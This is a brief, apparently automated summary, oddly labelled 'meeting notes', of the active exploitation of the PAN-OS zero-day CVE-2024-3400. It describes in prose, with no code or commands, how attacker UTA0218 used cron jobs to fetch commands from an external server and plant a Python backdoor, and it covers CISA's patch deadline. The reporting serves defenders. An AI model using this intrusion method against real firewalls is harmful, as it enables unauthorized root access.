April 13, 2024 at 05:27AM
Threat actors have been actively exploiting a critical zero-day flaw (CVE-2024-3400) in Palo Alto Networks PAN-OS software, allowing unauthorized code execution. Dubbed Operation MidnightEclipse, the attack involves creating cron jobs to run commands from an external server, triggering a Python-based backdoor. The actor UTA0218 displays advanced capabilities and likely state-backing. Prompt patching is crucial.
The meeting notes highlight a critical security vulnerability, CVE-2024-3400, in Palo Alto Networks PAN-OS software, which has been exploited by threat actors under the name Operation MidnightEclipse. This command injection flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 configurations with GlobalProtect gateway and device telemetry enabled, allowing unauthenticated attackers to execute arbitrary code with root privileges on the firewall. The attackers have been observed utilizing this flaw to create a cron job that fetches and executes commands from an external server, potentially delivering a Python-based backdoor onto the firewall. The threat actor is identified as UTA0218 by Volexity and is suspected to be state-backed due to the resources and capabilities displayed. Organizations using Palo Alto Networks GlobalProtect firewall are advised to monitor for signs of lateral movement internally. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, requiring federal agencies to apply patches by April 19, with Palo Alto Networks expected to release fixes by April 14. This information underscores the importance of vigilance and prompt action in response to emerging cyber threats.